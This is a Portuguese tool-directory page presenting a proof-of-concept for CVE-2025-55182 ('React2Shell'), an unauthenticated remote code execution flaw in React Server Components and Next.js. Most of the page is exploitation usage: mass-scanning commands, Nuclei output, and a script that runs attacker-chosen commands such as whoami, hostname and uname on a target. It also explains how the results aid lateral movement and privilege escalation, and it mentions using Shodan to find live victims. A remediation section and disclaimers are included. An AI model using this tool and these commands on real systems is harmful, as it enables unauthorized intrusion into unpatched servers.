Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell-PoC-CVE-2025-55182 — Exploração da vulnerabilidade de segurança CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/eagle-nett/react2shell-poc-cve-2025-55182
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubeagle-nett/react2shell-poc-cve-2025-55182

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell-PoC-CVE-2025-55182

Exploração da vulnerabilidade de segurança CVE-2025-55182

Ver Repositório
há 4 mesesAinda não revisado

Simulação de exploração do React2Shell (CVE-2025-55182)

Nota:

  • Este documento serve apenas para fins educacionais e de pesquisa em segurança.
  • Não use para atacar sistemas sem autorização.

1. Visão geral

CVE-2025-55182, também conhecido como React2Shell, é uma vulnerabilidade grave de execução remota de código (RCE) que afeta o React Server Components (RSC). Ele usa o protocolo Flight para comunicação entre cliente e servidor. Quando o cliente solicita dados, o servidor recebe um payload e o analisa, o que pode permitir que um atacante injete estruturas maliciosas ou trechos de código arbitrários que o React aceita como válidos.

ItemConteúdo
SeveridadeCritical (CVSS 10.0)
TipoUnsafe Deserialization (CWE-502)
Método de ataqueRemoto, sem autenticação necessária
Versões afetadas:React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 e Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6

2. Causa

O servidor processa o payload do cliente sem validação completa, permitindo que o atacante:

  • Injete payload malicioso
  • Execute código no servidor
  • Explore a vulnerabilidade sem autenticação do usuário, pois é uma falha pré-autenticação.

A atividade de exploração relacionada a esta vulnerabilidade foi detectada desde 5 de dezembro de 2025. A maioria das explorações bem-sucedidas originou-se de avaliações de grupos de ataque. Ambos os ambientes Windows e Linux são afetados.

3. Experimentação

Instalação

root@kitploit:~
pip install -r requirements.txt

Escanear um servidor vulnerável:

root@kitploit:~
python3 scanner.py -u https://example.com

Insira o caminho a ser escaneado (aqui, inseri meu servidor vulnerável: http://192.168.10.1:3000)

image

Resultado obtido:

image
root@kitploit:~
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

Além disso, você pode escanear conforme o seu objetivo de exploração:

Escanear uma lista de servidores:

root@kitploit:~
python3 scanner.py -l hosts.txt

Escanear com múltiplas threads e salvar o resultado:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Escanear com cabeçalhos personalizados:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Escanear alvos Windows:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Usar o método seguro de detecção por canal lateral:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check
image

Como você pode ver, estamos lidando com uma vulnerabilidade de segurança, o que significa que o nosso servidor é facilmente atacável por um atacante.


Nuclei

Agora vamos usar o Nuclei para verificar se o servidor acima possui alguma vulnerabilidade com PoC. Esse recurso funciona enviando requisições personalizadas, minimizando falsos positivos e suportando varredura paralela.

root@kitploit:~
nuclei -t scan.yaml -u http://192.168.10.1:3000

Resultado obtido:

root@kitploit:~
[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

O sistema detectou que este servidor está vulnerável e pode ser explorado pela falha CVE-2025-55182. E a partir disso, você pode ver que é uma vulnerabilidade bastante perigosa e importante, com muitos PoCs já disponíveis em plataformas sociais. ☺☺☺

4. Como explorar

Você pode ver que apenas essas informações já são suficientes para confirmar que a vulnerabilidade de segurança existe no aplicativo acima. Para provar que este aplicativo pode ser utilizado para executar um comando ou executar código remotamente, iniciarei o PoC.

root@kitploit:~
chmod +x scanner.sh

Uso

root@kitploit:~
# Check xem đối phương có vulnerable ko
./datscan.sh -d example.com

# Thực thi lệnh kiểm tra user hiện tại
./datscan.sh -d example.com -c "whoami"

# With full URL
./datscan.sh -d example.com -c "uname -a"
image

Significado:

Retorna o usuário atual que está executando o processo do servidor

Ajuda a identificar:

  • sob qual usuário o aplicativo está sendo executado
  • o nível de privilégio (privilégio baixo ou admin)

=> Este é o comando mais básico para confirmar RCE bem-sucedido.

Nota

  • -d, --domain - domain/URL
  • -c, --command - Comando a ser executado (ex.: whoami, hostname,...)

Exemplo

root@kitploit:~
# Check xem tên máy
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# Xác định phiên bản hệ điều hành
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# Kiểm tra command execution có hoạt động ổn định không
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"

ILUSTRAÇÃO APÓS A EXECUÇÃO

image

Este é o passo de reconhecimento inicial após a exploração bem-sucedida.

Ajuda a confirmar: a RCE funciona, identificar o sistema operacional,...

ATENÇÃO

Como este experimento está sendo demonstrado em um laboratório pessoal para evitar problemas legais, o uso de cabeçalhos HTTP para exfiltração de dados, saídas grandes ou caracteres especiais pode causar:

  • ERR_INVALID_CHAR
  • Respostas reduzidas
  • Timeouts
image

Comandos curtos (por exemplo, whoami, ver) são mais confiáveis para ilustrar no ambiente de teste acima.

Se preferir, você pode usar o Shodan para verificar endereços IP diretamente no ambiente real e fazer como no meu experimento acima para explorar (não recomendado).

image

Como observado acima. Esta ferramenta é destinada apenas a fins educacionais e a testes de segurança autorizados. Não use esta ferramenta para testar sistemas que você não possui ou para os quais não tem autorização de teste.

5. Algumas formas de corrigir a vulnerabilidade

  • Não confiar em dados do cliente
  • Validar rigorosamente as entradas
  • Atualizar as versões
    • React: >= 19.0.1 / 19.1.2 / 19.2.1
    • Next.js: >= 15.0.5 / 16.0.7

6. Referências adicionais

  • CVE-2025-55182 – https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • CVE-2025-55182 - https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/
Baixar ferramenta
Significado dos comandos de execuçãoConteúdo
Retorna o nome do hostUsado para:
- identificar o sistema afetado
- auxiliar na movimentação lateral (em ambiente interno)
Determina a versão do sistema operacionalImportante para:
- avaliar a possibilidade de exploração adicional (escalonamento de privilégios)
- escolher o exploit adequado
Verifica a execução de comandosUsado para depurar payload / scanner
Retorna o nome de usuário atualNeste caso:
-o usuário é ADMIN → pode ter privilégios elevados
- Mais importante que o whoami em alguns casos no Windows
Retorna o nome do hostRetorna o nome do host por meio da variável de ambiente